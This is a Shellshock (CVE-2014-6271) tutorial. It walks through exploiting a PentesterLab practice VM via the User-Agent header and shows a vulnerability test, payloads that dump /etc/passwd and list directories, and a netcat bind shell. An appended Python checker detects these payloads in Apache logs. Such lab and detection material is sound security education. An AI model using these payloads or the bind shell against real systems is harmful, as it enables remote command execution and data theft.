Shellshock Explained + Exploitation Tutorial
Introduction
Shellshock is a “code injection attack” that takes advantage of a function definition vulnerability in Bash 4.3 and earlier.
The vulnerability is caused by Bash processing trailing strings after function definitions in the values of environment variables: when Bash imports such a variable, it executes whatever follows the function body. Patched releases of Bash 4.3 and later no longer execute these trailing strings.
Testing
To test whether your system is vulnerable, run the command below in a Bash shell.
If 'vulnerable' is echoed back, your system is vulnerable: the echo vulnerable statement sits directly after the function definition env x='() { :;}; in the variable's value, and a vulnerable Bash executes it while importing the environment.
A response of 'not-vulnerable' indicates your system is not vulnerable to this particular test.
Note: Additional tests should be performed to confirm your system is not vulnerable to Shellshock.
These tests can be found on the Shellshocker website: https://shellshocker.net/
Exploitation
Launch the 'Pentester Lab: CVE-2014-6271 Shellshock' VM (https://pentesterlab.com/exercises/cve-2014-6271), then browse to the VM’s IP in your web browser.
You will be presented with the output of the uptime and uname -a Linux commands, run on the Pentesterlab VM.
CVE-2014-6271
This system is running:
uptime: 20:44:15 up 0 min, 1 users, load average: 0.06, 0.01, 0.00
kernel: Linux vulnerable 3.14.1-pentesterlab #1 SMP Sun Jul 6 09:16:00 EST 2014 i686 GNU/Linux
View the page source and you’ll notice the location of the CGI script (background on CGI: http://www.techrepublic.com/article/cgi-crash-course-how-to-run-cgi-scripts/) that is executed on the server:
$.getJSON("/cgi-bin/status", function (data) {
Let’s use curl to launch a few Shellshock attacks against the status CGI script via the User-Agent string (-A in curl). The web server passes request headers such as User-Agent to the CGI script as environment variables, which is what gives Bash the chance to import the malicious function definition.
Passwd File
user@debian8:~$
root:x:0:0:root:/root:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/false
tc:x:1001:50:Linux User,,,:/home/tc:/bin/sh
pentesterlab:x:1000:50:Linux User,,,:/home/pentesterlab:/bin/sh
Directory Listing
bin
boot
dev
etc
home
init
...
Bind Shell
Bind an instance of Bash to a netcat listener on port 2345 and connect to it.
After executing the bind shell on the Shellshock VM (/usr/bin/nc -lvvp 2345 -e /bin/bash), open a new terminal window and connect with nc -vn 192.168.1.14 2345.
user@debian8:~$
(UNKNOWN) [192.168.1.14] 2345 (?) open
[eth0]
Link encap:Ethernet HWaddr 08:00:27:84:1F:23
inet addr:192.168.1.14 Bcast:192.168.1.255 Mask:255.255.255.0
inet6 addr: fe80::a00:27ff:fe84:1f23/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:742 errors:0 dropped:0 overruns:0 frame:0
TX packets:426 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:57418 (56.0 KiB) TX bytes:246492 (240.7 KiB)
Interrupt:10 Base address:0xd020
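Because every attack above travelled through a request header that the web server exported into the CGI environment, the attempts are visible in the web server's access log. The following is an added example (not part of the original tutorial): a small Python checker that parses Apache combined-format log lines and flags Referer or User-Agent values carrying a Shellshock-style function definition. The log lines are constructed for this example.

```python
import re

# Apache "combined" log format: client, ident, user, [time], "request",
# status, size, "referer", "user-agent".
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# A Shellshock payload is a Bash function definition "() { ... }" followed by
# a ";" and trailing commands. Whitespace inside the definition is optional,
# so the pattern tolerates both "() { :;};" and "() { :; };".
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{[^}]*\}\s*;\s*\S')


def parse_line(line):
    """Return the log fields as a dict, or None if the line is not combined format."""
    m = LOG_RE.match(line.rstrip("\n"))
    return m.groupdict() if m else None


def is_shellshock(value):
    """True if a header value looks like a function definition with trailing commands."""
    return bool(SHELLSHOCK_RE.search(value))


def find_shellshock(lines):
    """Return (ip, request, header, value) for every line whose Referer or
    User-Agent carries a Shellshock-style payload; unparsable lines are skipped."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        for header in ("referer", "ua"):
            if is_shellshock(rec[header]):
                hits.append((rec["ip"], rec["request"], header, rec[header]))
    return hits


# Constructed sample log lines (not taken from the original page).
SAMPLE_LOG = [
    '192.168.1.20 - - [25/Sep/2014:20:44:15 +0000] "GET /cgi-bin/status HTTP/1.1" 200 312 "-" "Mozilla/5.0 (X11; Linux i686) Firefox/32.0"',
    '192.168.1.20 - - [25/Sep/2014:20:45:01 +0000] "GET /cgi-bin/status HTTP/1.1" 200 1472 "-" "() { :;}; /bin/cat /etc/passwd"',
    '192.168.1.20 - - [25/Sep/2014:20:45:09 +0000] "GET /cgi-bin/status HTTP/1.1" 500 0 "() { :; }; /bin/ls /" "curl/7.38.0"',
    '10.0.0.5 - - [25/Sep/2014:20:46:00 +0000] "GET /index.html HTTP/1.1" 200 812 "-" "Mozilla/5.0 () { not a payload"',
]

if __name__ == "__main__":
    for ip, req, hdr, val in find_shellshock(SAMPLE_LOG):
        print(f"{ip} {req} {hdr}={val!r}")
```

Only Referer and User-Agent are recorded in the combined format; other headers the server exports (for example Cookie) would need a custom LogFormat to be inspected the same way.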
Conclusion
The examples above demonstrate a tiny fraction of what is possible using the Shellshock vulnerability.
Additional attack vectors include:
– OpenSSH server
– DHCP clients
– Qmail server
– IBM HMC restricted shell
If your system is vulnerable, ensure it is patched immediately by upgrading your version of Bash, then re-test.